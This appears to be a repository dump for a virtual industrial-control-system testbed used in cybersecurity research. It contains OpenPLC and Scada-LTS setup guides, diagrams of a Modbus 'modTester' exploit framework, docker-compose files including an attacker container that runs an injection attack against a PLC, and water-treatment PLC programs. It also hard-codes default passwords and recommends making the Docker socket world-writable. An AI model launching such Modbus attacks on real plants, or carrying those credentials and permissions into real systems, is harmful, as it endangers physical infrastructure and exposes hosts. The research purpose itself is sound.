| 3 | ## How to create your own OpenPLC image 4 | 5 | - Build openplc image: 6 | - cd `~/ICSVirtual/openplc` 7 | - `docker build -t open-plc .` 8 | 9 | ## Use the OpenPLC image created for the project 10 | 11 | - Open docker-compose file `cd ~/ICSVirtual/network/ICSNetwork`. 12 | - Change the image of the `openplc` service by `sflorenz05/open-plc:v0.1`. 13 | - The login credentials are set by default to `openplc` for both user and password. 14 | 15 | 16 | ## Follow this recommendation [Only for Modbus] 17 | 18 | - Once OpenPLC container is running: 19 | 20 | - Disable DNP3/EtherNET/IP to use only Modbus protocol: 21 | 22 | ![openplc1](https://user-images.githubusercontent.com/6643905/213804713-f33fb296-b494-46f0-8dc1-ad5874dadd69.png) 23 | 24 | - Load the `*.st` file of the project. 25 | - E.g.: file `water_heater.st` is placed into `~/ICSVirtual/openplc/sample/`. 26 | 27 | - Start PLC. 28 | 29 | ![openplc2](https://user-images.githubusercontent.com/6643905/213805040-80911d05-c443-4851-a7b8-ef86ff6cea5c.png) 30 | -------------------------------------------------------------------------------- /documentation/Components/Scada-LTS-GNS3.md: -------------------------------------------------------------------------------- 1 | # Import ScadaBR in GNS3 2 | 3 | > **Note:** The image of ScadaBR is based on the project [carloskze/scadabr](https://hub.docker.com/r/carloskze/scadabr) which is an update of the [bitelxux/scadabr](https://github.com/bitelxux/scadabr) project. 4 | 5 | 6 | 1. Import the [carloskze/scadabr](https://hub.docker.com/r/carloskze/scadabr) image from docker hub: `docker pull carloskze/scadabr`. 7 | 8 | 2. Import the docker container: 9 | 10 | ![image](https://user-images.githubusercontent.com/6643905/217917979-b9f6edec-bc9d-4561-832a-4591be7fa32a.png) 11 | 12 | 3. Apply the following basic configurations: 13 | 14 | ![image](https://user-images.githubusercontent.com/6643905/217918649-19b5a735-e39b-4dda-ab68-099f12e36860.png) 15 | 16 | 4. Apply the following network configurations: 17 | 18 | ![image](https://user-images.githubusercontent.com/6643905/217919051-565afa38-7e78-4a44-af06-9bd831e8f3dc.png) 19 | -------------------------------------------------------------------------------- /documentation/Components/Scada-LTS.md: -------------------------------------------------------------------------------- 1 | # Build and Set-Up Scada-LTS 2 | 3 | - Once Scada-LTS container is running: 4 | - Access to Scada-LTS GUI: [http://localhost:8080/ScadaBR/](http://localhost:8080/Scada-LTS/). 5 | - Login with `username`: admin `password`: admin. 6 | - Create empty script in "Scripting". 7 | 8 | ![scada1](https://user-images.githubusercontent.com/6643905/213805504-f13c140d-5d9c-4ff8-90a4-494c00893c47.png) 9 | 10 | - Next go to the "SQL" tab. 11 | - Paste content scripts-one-insert.txt file into the text field "SQL". 12 | 13 | - File `scripts-one-insert.txt` is placed into `~/ICSVirtual/scada-lts/scripts`. 14 | - Click "Submit update" 15 | - If the operation is successful, the information about adding 12 records will be displayed. 16 | 17 | ![scada2](https://user-images.githubusercontent.com/6643905/213805526-3ab62586-805e-4fc1-9905-021bc9290cbd.png) 18 | 19 | - Then import the project (.json file). 20 | - E.g.: file `Water Heater 3 Stations.json` is placed into `~/ICSVirtual/scada-lts/sample/` 21 | 22 | ![scada3](https://user-images.githubusercontent.com/6643905/213805636-c5e90c53-c72b-4104-a3b9-15c76074a79d.png) 23 | 24 | - Add a data source running on port 502 with host:openplc. 25 | - Make the connection with OpenPLC. 26 | 27 | ![scada4](https://user-images.githubusercontent.com/6643905/213805643-020e7678-3582-438b-8772-267038a42282.png) 28 | 29 | - Add the background image at "Graphical views". 30 | - E.g.: file `background.png` is placed into `~/ICSVirtual/scada-lts/sample/` 31 | 32 | ![scada5](https://user-images.githubusercontent.com/6643905/213805647-30d870e5-e390-45d5-9ba1-b9dfe0c4f8ad.png) 33 | 34 | - Change the name of the file named .env.example in /ICSVirtual/network/ICSNetwork : 35 | 36 | `cd ~/ICSVirtual/network/ICSNetwork` 37 | 38 | `mv .env.example .env` 39 | 40 | ## Troubleshootings Scada-LTS 41 | 42 | - [Graphical views Scada-LTS #1961](https://github.com/SCADA-LTS/Scada-LTS/issues/1961) 43 | -------------------------------------------------------------------------------- /documentation/Diagrams/ModTester.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/documentation/Diagrams/ModTester.png -------------------------------------------------------------------------------- /documentation/Diagrams/ModTester.uml: -------------------------------------------------------------------------------- 1 | @startuml 2 | title modTester.py initialization 3 | 4 | partition modTester.py { 5 | (*) --> "Add /System to module path" 6 | "Add /System to module path" --> "Import Interface from System.Core" 7 | "Import Interface from System.Core" --> "Inteface.Init()" 8 | "Inteface.Init()" --> === S1 === 9 | -->"Interface.mainLoop(args)" 10 | 11 | } 12 | 13 | partition Interface.py #FFDB74{ 14 | === S1 === --> "Create Loader" 15 | "Create Loader" --> "Load modules from Application/modules and update module number" 16 | "Load modules from Application/modules and update module number" --> "Print Banner" 17 | "Print Banner" --> === S1 === 18 | 19 | "Interface.mainLoop(args)" --> "Create and set Completer" 20 | "Create and set Completer" --> "Crawl and Load Plugins" 21 | "Crawl and Load Plugins" --> "Set RHOSTS to argument, set Threads to 254" 22 | --> "Read input" 23 | if "Input?" then 24 | -->[Modtester command] "Execute Module" 25 | else 26 | -->[not a command] "Read input" 27 | else 28 | -->[exit] "Exit program" 29 | 30 | } 31 | 32 | 33 | partition Application/modules/modbus/module.py #SkyBlue{ 34 | 35 | "Execute Module" --> "Read Input" 36 | if "Input?" then 37 | -->[input is "back"] "Read input" 38 | else 39 | -->[Input is module variable] "Configure variable" 40 | else 41 | -->[input is "exploit"]"Exploit" 42 | 43 | "Configure variable" --> "Read Input" 44 | "Exploit" --> "Show result" 45 | "Show result" --> "Read Input" 46 | 47 | 48 | 49 | 50 | } 51 | 52 | @enduml 53 | -------------------------------------------------------------------------------- /documentation/Diagrams/ModTester_automation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/documentation/Diagrams/ModTester_automation.png -------------------------------------------------------------------------------- /documentation/Diagrams/ModTester_automation.uml: -------------------------------------------------------------------------------- 1 | @startuml 2 | title modTester.py initialization 3 | 4 | partition parameters.json #DBFF74{ 5 | "Show attack list" --> "Configure attacks, IPs and mode" 6 | 7 | } 8 | 9 | 10 | partition automation.py #FF8B74{ 11 | 12 | (*) --> "Import libraries" 13 | --> "Define dictionary with module names and paths" 14 | --> "Create Redis connection on port 6379" 15 | --> "redis.set('finished', 0)" 16 | --> read parameters.json, load data and print configured attack names 17 | --> ======S1======= 18 | if "while attacks is not empty" then 19 | if "'finished' == 0?" then 20 | --> [yes]"redis.set('finished', 1)" 21 | --> "Format command with first element of attacks and ip" 22 | --> "Execute command via shell and append to subprocess list" 23 | "Remove first element of attacks" -left-> =====S1===== 24 | else 25 | -->[no] "Exit program" 26 | 27 | 28 | } 29 | 30 | partition modTester.py { 31 | 32 | "Execute command via shell and append to subprocess list" --> "python2 modTester.py {0} {1}.format(names[data['attacks'][0]], data['ips'][0]" 33 | --> "..." 34 | --> "Show Result" 35 | --> "Remove first element of attacks" 36 | 37 | } 38 | 39 | 40 | 41 | 42 | @enduml 43 | -------------------------------------------------------------------------------- /documentation/Requirements/basic-requirements.md: -------------------------------------------------------------------------------- 1 | # Basic requirements 2 | 3 | 1. Install [docker for ubuntu](https://docs.docker.com/engine/install/ubuntu/). 4 | 1. [Manage Docker as non-root user](https://docs.docker.com/engine/install/linux-postinstall/). 5 | 1. If it does not work try running `sudo chmod o+rw /var/run/docker.sock` after adding a new user 6 | 2. Install [docker-compose for ubuntu](https://docs.docker.com/compose/install/). 7 | 3. Install make `sudo apt install make`. 8 | 4. Install g++: 9 | 1. `sudo apt-get update` 10 | 2. `sudo apt-get install -y g++` 11 | -------------------------------------------------------------------------------- /documentation/StateOfArt/Papers/1-s2.0-S1474667017485326-main.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/documentation/StateOfArt/Papers/1-s2.0-S1474667017485326-main.pdf -------------------------------------------------------------------------------- /documentation/StateOfArt/Papers/2210.13325.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/documentation/StateOfArt/Papers/2210.13325.pdf -------------------------------------------------------------------------------- /documentation/StateOfArt/Papers/Dragos_ChernoviteWP_v2b.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/documentation/StateOfArt/Papers/Dragos_ChernoviteWP_v2b.pdf -------------------------------------------------------------------------------- /documentation/StateOfArt/Papers/IEEE_An_Open-Source_Testbed_to_Visualise_ICS_Cybersecurity_Weaknesses_and_Remediation_Strategies__A_Research_Agenda_Proposal.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/documentation/StateOfArt/Papers/IEEE_An_Open-Source_Testbed_to_Visualise_ICS_Cybersecurity_Weaknesses_and_Remediation_Strategies__A_Research_Agenda_Proposal.pdf -------------------------------------------------------------------------------- /documentation/StateOfArt/Papers/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/documentation/StateOfArt/Papers/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf -------------------------------------------------------------------------------- /documentation/StateOfArt/Papers/Stuxnet_Dissecting_a_Cyberwarfare_Weapon.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/documentation/StateOfArt/Papers/Stuxnet_Dissecting_a_Cyberwarfare_Weapon.pdf -------------------------------------------------------------------------------- /documentation/StateOfArt/Papers/applsci-12-07942.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/documentation/StateOfArt/Papers/applsci-12-07942.pdf -------------------------------------------------------------------------------- /documentation/StateOfArt/Project Documentation/Testbed_WWTP/Testbed_basado_en_WWTP_sobre_GNS3_para_desarrollo_de_pruebas_de_seguridad.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/documentation/StateOfArt/Project Documentation/Testbed_WWTP/Testbed_basado_en_WWTP_sobre_GNS3_para_desarrollo_de_pruebas_de_seguridad.pdf -------------------------------------------------------------------------------- /documentation/StateOfArt/Project Documentation/WWTP_PLC_Interfaz/WWTP_PLC_Interface.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/documentation/StateOfArt/Project Documentation/WWTP_PLC_Interfaz/WWTP_PLC_Interface.pdf -------------------------------------------------------------------------------- /documentation/StateOfArt/Project Documentation/WWTP_PLC_Interfaz/main.tex: -------------------------------------------------------------------------------- 1 | \documentclass{article} 2 | 3 | % Language setting 4 | % Replace `english' with e.g. `spanish' to change the document language 5 | \usepackage[spanish]{babel} 6 | 7 | % Set page size and margins 8 | % Replace `letterpaper' with `a4paper' for UK/EU standard size 9 | \usepackage[letterpaper,top=2cm,bottom=2cm,left=3cm,right=3cm,marginparwidth=1.75cm]{geometry} 10 | 11 | % Useful packages 12 | \usepackage{amsmath} 13 | \usepackage{graphicx} 14 | \usepackage[colorlinks=true, allcolors=blue]{hyperref} 15 | \usepackage{array} 16 | \usepackage{multirow} 17 | 18 | \title{Diseño de Interfaz WWTP-PLC mediante el protocolo Modbus} 19 | \author{Ander Gómez Iglesias} 20 | \date{2023} 21 | 22 | \begin{document} 23 | 24 | \maketitle 25 | 26 | \section{Variables} 27 | Las variables que se monitorizan dentro del WWTP son las siguientes:\\ 28 | 29 | \begin{tabular}{ |p{3cm}|p{2cm}|p{2cm}|p{2cm}|p{2cm}| } 30 | \hline 31 | \multicolumn{5}{|c|}{Variables} \\ 32 | \hline 33 | Variable &Símbolo &I/O &Valor &Tipo\\ 34 | \hline 35 | Caudal de Purga & Qw &Input &95145 &int\\ 36 | Nitrato& NO & Input &1.3 &float\\ 37 | Amonio &NH4 &Input &6.85 &float\\ 38 | Oxígeno disuelto &O &Input &0.0254 &float\\ 39 | Sólido Suspendido &SOL &Input &3138.87 &float\\ 40 | Aireación &AIR &Input &3 &int\\ 41 | Temperatura &T &Input &15 &int\\ 42 | Caudal de Aire &Qair &Output &30 - 200 &int\\ 43 | Caudal de recirculación interna &Qri &Output &57087 &int\\ 44 | \hline 45 | \end{tabular}\\\\ 46 | 47 | Teniendo en cuenta la \href{https://openplcproject.com/docs/2-5-modbus-addressing/}{tabla de direcciones de memoria de Modbus de OpenPLC} y las \href{https://openplcproject.gitlab.io/openplc_v3/iec__types_8h.html}{referencias de tipo de variable}se han asignado los siguientes registros a cada una de las variables:\\\\ 48 | 49 | \begin{tabular}{ |p{3cm}|p{2cm}|p{2cm}|p{2cm}|p{2cm}|p{2cm}| } 50 | \hline 51 | \multicolumn{6}{|c|}{Variables} \\ 52 | \hline 53 | Variable &Símbolo &I/O &Valor &Tipo &Dirección de Memoria\\ 54 | \hline 55 | Caudal de Purga & Qw &Input &95145 &DINT &MD0\\ 56 | Nitrato& NO & Input &1.3 &REAL &MD2\\ 57 | Amonio &NH4 &Input &6.85 &REAL &MD4\\ 58 | Oxígeno disuelto &O &Input &0.0254 &REAL &MD6\\ 59 | Sólido Suspendido &SOL &Input &3138.87 &REAL &MD8\\ 60 | Aireación &AIR &Input &3 &INT &IW1\\ 61 | Temperatura &T &Input &15 &INT &IW2\\ 62 | Caudal de Aire &Qair &Output &30 - 200 &INT &QW1\\ 63 | Caudal de recirculación interna &Qri &Output &57087 &INT &QW2\\ 64 | \hline 65 | \end{tabular} 66 | 67 | \begin{tabular}{ |p{3cm}|p{2cm}|p{2cm}|p{2cm}|p{2cm}|p{2cm}| } 68 | \hline 69 | \multicolumn{6}{|c|}{Variables} \\ 70 | \hline 71 | Variable &Símbolo &I/O &Valor &Tipo &Dirección de Memoria\\ 72 | \hline 73 | Caudal de Purga & Qw &Input &95145 &REAL &MD0\\ 74 | Nitrato& NO & Input &1.3 &REAL &MD2\\ 75 | Amonio &NH4 &Input &6.85 &REAL &MD4\\ 76 | Oxígeno disuelto &O &Input &0.0254 &REAL &MD6\\ 77 | Sólido Suspendido &SOL &Input &3138.87 &REAL &MD8\\ 78 | Aireación &AIR &Input &3 &REAL &MD10\\ 79 | Temperatura &T &Input &15 &REAL &MD12\\ 80 | Caudal de Aire &Qair &Output &30 - 200 &REAL &MD14\\ 81 | Caudal de recirculación interna &Qri &Output &57087 &REAL &MD16\\ 82 | \hline 83 | \end{tabular} 84 | 85 | \end{document} 86 | 87 | 88 | 89 | 90 | 91 | -------------------------------------------------------------------------------- /documentation/UseCases/WWTP.md: -------------------------------------------------------------------------------- 1 | # Water Waste Tratement Plant (WWTP) 2 | 3 | ## For deployment based on `docker compose` 4 | 5 | ## For deployment based on `GNS3` 6 | 7 | ![Network](https://user-images.githubusercontent.com/6643905/213818612-f9d95427-7247-4e99-9432-671ac181470e.png) -------------------------------------------------------------------------------- /documentation/UseCases/WaterHeater.md: -------------------------------------------------------------------------------- 1 | # Water Heater Experiment 2 | 3 | ## For deployment based on `docker compose` 4 | 5 | ## For deployment based on `GNS3` 6 | -------------------------------------------------------------------------------- /documentation/YouSnoozeYouLose.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/documentation/YouSnoozeYouLose.pdf -------------------------------------------------------------------------------- /network/DockerDeployment/ICSNetwork/Makefile: -------------------------------------------------------------------------------- 1 | #set +x 2 | 3 | # default path to be used in connection profile files 4 | ABSPATH?=$(shell dirname $(shell dirname $(shell dirname ${PWD}))) 5 | 6 | WHICHOS := $(shell uname) 7 | 8 | start: 9 | ./scripts/start-icsnetwork.sh 10 | 11 | stop: 12 | ./scripts/stop-icsnetwork.sh 13 | 14 | destroy: 15 | ./scripts/destroy-icsnetwork.sh 16 | 17 | ifeq ($(WHICHOS),Darwin) 18 | rm *-e 19 | endif 20 | export ABSPATH=${ABSPATH} -------------------------------------------------------------------------------- /network/DockerDeployment/ICSNetwork/database/db.env: -------------------------------------------------------------------------------- 1 | # MySQL database environment variable configuration file 2 | MYSQL_ROOT_PASSWORD=root 3 | MYSQL_USER=root 4 | MYSQL_PASSWORD=root 5 | MYSQL_DATABASE=scadalts -------------------------------------------------------------------------------- /network/DockerDeployment/ICSNetwork/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | networks: 4 | ics: 5 | driver: bridge 6 | 7 | services: 8 | 9 | scadalts: 10 | image: kamiljarmusik/scadalts-2.6.18-mysql-8 11 | ports: 12 | - "8080:8080" 13 | env_file: ./database/db.env 14 | expose: [ "8080", "8000" ] 15 | networks: 16 | - ics 17 | 18 | openplc: 19 | image: sflorenz05/open-plc:v0.1 20 | depends_on: 21 | - scadalts 22 | ports: 23 | - "502:502" 24 | - "8081:8080" 25 | command: -privileged 26 | networks: 27 | - ics 28 | 29 | matlab: 30 | image: sflorenz05/matlab_simulink:v0.3 31 | shm_size: 512M 32 | ports: 33 | - "5901:5901" 34 | - "6080:6080" 35 | environment: 36 | PASSWORD: "ILoveMATLAB" 37 | command: -vnc 38 | volumes: 39 | - ../../../wwtp/simulink:/home/matlab/Documents/MATLAB/simulink 40 | networks: 41 | - ics 42 | 43 | simlink: 44 | image: frolvlad/alpine-gxx 45 | #command: g++ /simLink/simlink.cpp -o simlink -pthread 46 | command: tail -F anything 47 | volumes: 48 | - ../../../wwtp/interface_simLink:/simLink 49 | networks: 50 | - ics 51 | 52 | -------------------------------------------------------------------------------- /network/DockerDeployment/ICSNetwork/scripts/destroy-icsnetwork.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "Stopping ics network container" 3 | docker compose down 4 | sudo rm -rf ../../mysql/databases -------------------------------------------------------------------------------- /network/DockerDeployment/ICSNetwork/scripts/start-icsnetwork.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | pwd 3 | docker compose -f docker-compose.yml up -d -------------------------------------------------------------------------------- /network/DockerDeployment/ICSNetwork/scripts/stop-icsnetwork.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "Stopping ics network container" 3 | #docker rm -f $(docker ps -aq) 4 | docker compose stop -------------------------------------------------------------------------------- /network/DockerDeployment/attacker/.env.example: -------------------------------------------------------------------------------- 1 | IP_PLC=18.12.14.1 2 | FREQ=100 -------------------------------------------------------------------------------- /network/DockerDeployment/attacker/Makefile: -------------------------------------------------------------------------------- 1 | #set +x 2 | 3 | # default path to be used in connection profile files 4 | ABSPATH?=$(shell dirname $(shell dirname $(shell dirname ${PWD}))) 5 | 6 | WHICHOS := $(shell uname) 7 | 8 | start: 9 | ./scripts/start-attacker.sh 10 | 11 | stop: 12 | ./scripts/stop-attacker.sh 13 | 14 | destroy: 15 | ./scripts/destroy-attacker.sh 16 | 17 | ifeq ($(WHICHOS),Darwin) 18 | rm *-e 19 | endif 20 | export ABSPATH=${ABSPATH} -------------------------------------------------------------------------------- /network/DockerDeployment/attacker/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | networks: 4 | icsnetwork_ics: 5 | external: true 6 | 7 | services: 8 | attacker: 9 | image: sflorenz05/attacker:v0.1 10 | working_dir: /attacker 11 | volumes: 12 | - ../../attacker:/attacker 13 | command: sh -c "./injection_attack -h ${IP_PLC} -f ${FREQ}" #command: tail -F anything #container running forever 14 | networks: 15 | - icsnetwork_ics 16 | -------------------------------------------------------------------------------- /network/DockerDeployment/attacker/scripts/destroy-attacker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "Destroy nlp engine container" 3 | docker compose down -------------------------------------------------------------------------------- /network/DockerDeployment/attacker/scripts/start-attacker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "Start attacker container" 3 | pwd 4 | docker compose -f docker-compose.yml up -d -------------------------------------------------------------------------------- /network/DockerDeployment/attacker/scripts/stop-attacker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "Stopping attacker container" 4 | 5 | #docker rm -f $(docker ps -aq) 6 | docker compose stop -------------------------------------------------------------------------------- /network/DockerDeployment/modtester/Makefile: -------------------------------------------------------------------------------- 1 | #set +x 2 | 3 | # default path to be used in connection profile files 4 | ABSPATH?=$(shell dirname $(shell dirname $(shell dirname ${PWD}))) 5 | 6 | WHICHOS := $(shell uname) 7 | 8 | start: 9 | ./scripts/start-modtester.sh 10 | 11 | stop: 12 | ./scripts/stop-modtester.sh 13 | 14 | destroy: 15 | ./scripts/destroy-modtester.sh 16 | 17 | ifeq ($(WHICHOS),Darwin) 18 | rm *-e 19 | endif 20 | export ABSPATH=${ABSPATH} -------------------------------------------------------------------------------- /network/DockerDeployment/modtester/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | networks: 4 | icsnetwork_ics: 5 | external: true 6 | 7 | services: 8 | modtester: 9 | image: sflorenz05/modtester:v0.2 10 | working_dir: /modtester 11 | volumes: 12 | - ../../modtester:/modtester 13 | command: tail -F anything 14 | networks: 15 | - icsnetwork_ics 16 | -------------------------------------------------------------------------------- /network/DockerDeployment/modtester/scripts/destroy-modtester.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "Destroy nlp engine container" 3 | docker compose down -------------------------------------------------------------------------------- /network/DockerDeployment/modtester/scripts/start-modtester.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "Start attacker container" 3 | pwd 4 | docker compose -f docker-compose.yml up -d -------------------------------------------------------------------------------- /network/DockerDeployment/modtester/scripts/stop-modtester.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "Stopping attacker container" 4 | 5 | #docker rm -f $(docker ps -aq) 6 | docker compose stop -------------------------------------------------------------------------------- /network/DockerDeployment/tcpdump/Makefile: -------------------------------------------------------------------------------- 1 | #set +x 2 | 3 | # default path to be used in connection profile files 4 | ABSPATH?=$(shell dirname $(shell dirname $(shell dirname ${PWD}))) 5 | 6 | WHICHOS := $(shell uname) 7 | 8 | start: 9 | ./scripts/start-tcpdump.sh 10 | 11 | stop: 12 | ./scripts/stop-tcpdump.sh 13 | 14 | destroy: 15 | ./scripts/destroy-tcpdump.sh 16 | 17 | ifeq ($(WHICHOS),Darwin) 18 | rm *-e 19 | endif 20 | export ABSPATH=${ABSPATH} -------------------------------------------------------------------------------- /network/DockerDeployment/tcpdump/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | 5 | tcpdump: 6 | image: kaazing/tcpdump 7 | volumes: 8 | - ../../tcpdump:/tcpdump 9 | network_mode: "host" 10 | -------------------------------------------------------------------------------- /network/DockerDeployment/tcpdump/scripts/destroy-tcpdump.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "Stopping tcpdump container" 3 | docker compose down 4 | sudo rm -rf ../../mysql/databases -------------------------------------------------------------------------------- /network/DockerDeployment/tcpdump/scripts/start-tcpdump.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | pwd 3 | docker compose -f docker-compose.yml up -d -------------------------------------------------------------------------------- /network/DockerDeployment/tcpdump/scripts/stop-tcpdump.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "Stopping tcpdump container" 3 | #docker rm -f $(docker ps -aq) 4 | docker compose stop -------------------------------------------------------------------------------- /network/GNS3Deployment/ICSVirtual.gns3project: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/network/GNS3Deployment/ICSVirtual.gns3project -------------------------------------------------------------------------------- /network/GNS3Deployment/demo.gns3project: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/network/GNS3Deployment/demo.gns3project -------------------------------------------------------------------------------- /openplc/process_sample2/watertreatment.st: -------------------------------------------------------------------------------- 1 | PROGRAM My_Program 2 | VAR 3 | CaudalPurga AT %MD0 : DINT := 95145; 4 | PINitrato AT %MW201 : INT := 100; 5 | PINitratoR AT %MW202 : INT := 130; 6 | SCNitrato AT %MW203 : INT := 125; 7 | SCNitratoR AT %MW204 : INT := 120; 8 | Amonio AT %MW205 : INT := 685; 9 | OxigenoDisuelto AT %MW206 : INT := 254; 10 | Aireacion AT %MW208 : INT := 3; 11 | Temperatura AT %MW209 : INT := 15; 12 | CaudalAire AT %MW210 : INT := 10; 13 | CaudalRecircInt AT %QW1 : INT:= 1; 14 | END_VAR 15 | VAR 16 | Input : BOOL; 17 | Output : BOOL; 18 | MOVE5_OUT : INT; 19 | MOVE3_OUT : INT; 20 | MOVE1_OUT : INT; 21 | END_VAR 22 | 23 | MOVE5_OUT := MOVE(PINitrato); 24 | PINitratoR := MOVE5_OUT; 25 | MOVE3_OUT := MOVE(SCNitratoR); 26 | PINitrato := MOVE3_OUT; 27 | MOVE1_OUT := MOVE(SCNitrato); 28 | SCNitratoR := MOVE1_OUT; 29 | END_PROGRAM 30 | 31 | 32 | CONFIGURATION Config0 33 | 34 | RESOURCE Res0 ON PLC 35 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0); 36 | PROGRAM instance0 WITH task0 : My_Program; 37 | END_RESOURCE 38 | END_CONFIGURATION 39 | -------------------------------------------------------------------------------- /openplc/simulink_interface.st: -------------------------------------------------------------------------------- 1 | FUNCTION_BLOCK Simulink_Conversion 2 | VAR_INPUT 3 | int_part : UINT; 4 | factor : INT; 5 | dec_part: UINT; 6 | END_VAR 7 | VAR 8 | int_real : REAL; 9 | factor_real : REAL; 10 | dec_real : REAL; 11 | END_VAR 12 | VAR_OUTPUT 13 | real_out: REAL; 14 | END_VAR 15 | 16 | (*Calculate decimal part*) 17 | dec_real := UINT_TO_REAL(dec_part); 18 | dec_real := dec_real / 10000.0; 19 | 20 | (*Calculate real number*) 21 | int_real := UINT_TO_REAL(int_part); 22 | factor_real := INT_TO_REAL(factor); 23 | real_out := (int_real * factor_real) + dec_real; 24 | 25 | END_FUNCTION_BLOCK 26 | 27 | 28 | 29 | 30 | 31 | PROGRAM My_Program 32 | VAR 33 | Temperatura_int AT %IW0 : UINT := 1; 34 | Temperatura_factor AT %IW1 : INT := 1; 35 | Temperatura_dec AT %IW2 : UINT := 57; 36 | OxigenoDisuelto_int AT %IW3 : UINT := 4; 37 | OxigenoDisuelto_factor AT %IW4 : INT := 1; 38 | OxigenoDisuelto_dec AT %IW5 : UINT := 57; 39 | Amonio_int AT %IW6 : UINT := 2; 40 | Amonio_factor AT %IW7 : INT := 1; 41 | Amonio_dec AT %IW8 : UINT := 57; 42 | Nitrato_int AT %IW9 : UINT := 1; 43 | Nitrato_factor AT %IW10 : INT := 1; 44 | Nitrato_dec AT %IW11 : UINT := 57; 45 | Aireacion AT %QW0 : UINT := 100; 46 | CaudalPurga AT %QW1 : UINT := 106; 47 | CaudalRecInr AT %QW2 : UINT := 5000; 48 | Temperatura_real AT %MD0 : REAL; 49 | OxigenoDisuelto_real AT %MD3 : REAL; 50 | Amonio_real AT %MD1 : REAL; 51 | Nitrato_real AT %MD2 : REAL; 52 | END_VAR 53 | VAR 54 | MOVE5_OUT : INT; 55 | Simulink_Conversion0: Simulink_Conversion; 56 | Simulink_Conversion1: Simulink_Conversion; 57 | Simulink_Conversion2: Simulink_Conversion; 58 | Simulink_Conversion3: Simulink_Conversion; 59 | END_VAR 60 | 61 | Simulink_Conversion0(int_part := Temperatura_int, factor := Temperatura_factor, dec_part:= Temperatura_dec); 62 | Temperatura_real := Simulink_Conversion0.real_out; 63 | Simulink_Conversion1(int_part := Amonio_int, factor := Amonio_factor, dec_part:= Amonio_dec); 64 | Amonio_real := Simulink_Conversion1.real_out; 65 | Simulink_Conversion2(int_part := Nitrato_int, factor := Nitrato_factor, dec_part:= Nitrato_dec); 66 | Nitrato_real := Simulink_Conversion2.real_out; 67 | Simulink_Conversion3(int_part := OxigenoDisuelto_int, factor := OxigenoDisuelto_factor, dec_part:= OxigenoDisuelto_dec); 68 | OxigenoDisuelto_real := Simulink_Conversion3.real_out; 69 | 70 | END_PROGRAM 71 | 72 | 73 | CONFIGURATION Config0 74 | 75 | RESOURCE Res0 ON PLC 76 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0); 77 | PROGRAM instance0 WITH task0 : My_Program; 78 | END_RESOURCE 79 | END_CONFIGURATION 80 | -------------------------------------------------------------------------------- /openplc/watertreatment.st: -------------------------------------------------------------------------------- 1 | PROGRAM My_Program 2 | VAR 3 | Nitrato AT %MD0 : REAL := 1055211.5; 4 | Amonio AT %MD2 : REAL := 102.0015; 5 | Temperatura AT %MD4 : REAL := 0.8544; 6 | OxigenoDisuelto AT %MD6 : REAL := 10504.5; 7 | Aireacion AT %MD8 : REAL := 100.2; 8 | CaudalPurga AT %MD10 : REAL := 106.5; 9 | CaudalRecircInt AT %MD12 : REAL := 57547.5; 10 | END_VAR 11 | VAR 12 | MOVE5_OUT : REAL; 13 | END_VAR 14 | 15 | MOVE5_OUT := MOVE(Temperatura); 16 | 